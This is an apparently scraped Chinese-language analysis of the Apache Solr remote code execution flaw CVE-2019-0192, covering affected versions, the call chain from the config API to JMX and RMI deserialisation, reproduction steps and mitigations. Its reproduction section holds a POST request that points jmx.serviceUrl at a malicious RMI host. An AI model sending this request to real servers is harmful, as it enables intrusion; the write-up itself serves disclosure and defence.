Apache Solr RCE漏洞分析（CVE-2019-0192）<\/h1>

漏洞概述<\/h2>

漏洞名称<\/strong>：Apache Solr远程代码执行漏洞（CVE-2019-0192）
影响版本<\/strong>：<\/p>

5.0.0至5.5.5<\/li>
6.0.0至6.6.5
安全版本<\/strong>：7.0及以上
漏洞类型<\/strong>：不安全的反序列化导致的远程代码执行
漏洞描述<\/strong>：通过ConfigAPI配置Solr的JMX服务器时，如果指向恶意的RMI服务器，攻击者可利用Solr的不安全反序列化机制在Solr端触发远程代码执行。<\/li> <\/ul>
漏洞原理分析<\/h2>
触发流程<\/h3>
完整的漏洞触发调用栈如下：<\/p>

org.apache.solr.handler.SolrConfigHandler#handleRequestBody<\/code><\/li>
org.apache.solr.handler.SolrConfigHandler.Command#handlePOST<\/code><\/li>
org.apache.solr.handler.SolrConfigHandler.Command#applySetProp<\/code><\/li>
org.apache.solr.core.CoreContainer#reload<\/code><\/li>
org.apache.solr.core.SolrConfig#SolrConfig<\/code><\/li>
org.apache.solr.core.SolrCore#reload<\/code><\/li>
org.apache.solr.core.SolrCore#SolrCore<\/code><\/li>
org.apache.solr.core.SolrCore#initInfoRegistry<\/code><\/li>
org.apache.solr.core.JmxMonitoredMap#JmxMonitoredMap<\/code><\/li>
javax.management.remote.JMXConnectorServerMBean#start<\/code><\/li> <\/ol> 详细分析<\/h3> 请求处理入口<\/strong>：<\/p> 访问路径\/config<\/code>进入SolrConfigHandler#handleRequestBody<\/code><\/li> POST请求会进入handlePOST<\/code>函数处理<\/li> <\/ul> <\/li> 配置修改流程<\/strong>：<\/p> 在handlePOST<\/code>中，会进入handleCommands<\/code>函数<\/li> 通过set-property<\/code>操作调用applySetProp<\/code>函数<\/li> applySetProp<\/code>将POST参数处理后生成新的ConfigOverlay<\/code>对象<\/li> 配置信息被持久化存储到configoverlay.json<\/code>文件中<\/li> <\/ul> <\/li> 服务重载流程<\/strong>：<\/p> 调用reload<\/code>函数重启服务器<\/li> 重新加载所有配置文件，包括刚修改的configoverlay.json<\/code><\/li> 在SolrConfig<\/code>构造函数中，使用配置参数创建JmxConfiguration<\/code>对象<\/li> <\/ul> <\/li> JMX触发点<\/strong>：<\/p> 在JmxMonitoredMap<\/code>的构造函数中进行JMX监控操作<\/li> 最终调用javax.management.remote.JMXConnectorServerMBean#start<\/code><\/li> 底层通过RMI协议与恶意服务器交互，触发反序列化漏洞<\/li> <\/ul> <\/li> <\/ol> 关键代码点<\/h3> JMX配置触发<\/strong>：<\/p> \/\/ SolrConfig构造函数中 <\/span><\/span><\/span><\/span>jmxConfig =<\/span> new<\/span> JmxConfiguration(<\/span>enable,<\/span> port,<\/span> serviceUrl,<\/span> authentication);<\/span> <\/span><\/span><\/code><\/pre><\/li> RMI连接建立<\/strong>：<\/p> 在JmxMonitoredMap<\/code>的else代码块中调用JMXConnectorServer#start<\/code><\/li> 实际转向javax.management.remote.rmi.RMIConnectorServer#start<\/code><\/li> 当检测到JNDI字符串在协议开头时，调用bind<\/code>方法进行远程服务器绑定<\/li> <\/ul> <\/li> <\/ol> 漏洞复现<\/h2> 复现环境<\/h3> Solr版本：5.0.0-5.5.5或6.0.0-6.6.5<\/li> JDK版本：存在反序列化漏洞的版本（如jdk-7u21）<\/li> <\/ul> 复现步骤<\/h3> 启动Solr：<\/p> .\/solr -e techproducts -Dcom.sun.management.jmxremote <\/span><\/span><\/code><\/pre><\/li> 构造恶意POST请求：<\/p> POST<\/span> \/solr\/[core]\/config HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target:8983<\/span> <\/span><\/span>Content-Type:<\/span> application\/json<\/span> <\/span><\/span> <\/span><\/span>{ <\/span><\/span> "set-property"<\/span>: { <\/span><\/span> "jmx.serviceUrl"<\/span>: "service:jmx:rmi:\/\/\/jndi\/rmi:\/\/malicious-server:1099\/exploit"<\/span> <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> 恶意RMI服务器：<\/p> 搭建包含恶意序列化payload的RMI服务器<\/li> 等待Solr服务器连接并触发反序列化<\/li> <\/ul> <\/li> <\/ol> 修复方案<\/h2> 升级到Solr 7.0或更高版本<\/li> 临时缓解措施：禁用ConfigAPI的写权限<\/li> 限制JMX端口的网络访问<\/li> 使用安全组或防火墙规则限制Solr的对外连接<\/li> <\/ul> <\/li> <\/ol> 参考链接<\/h2> 漏洞详情<\/a><\/li> 漏洞POC<\/a><\/li> 官方补丁<\/a><\/li> ConfigAPI文档<\/a><\/li> <\/ol>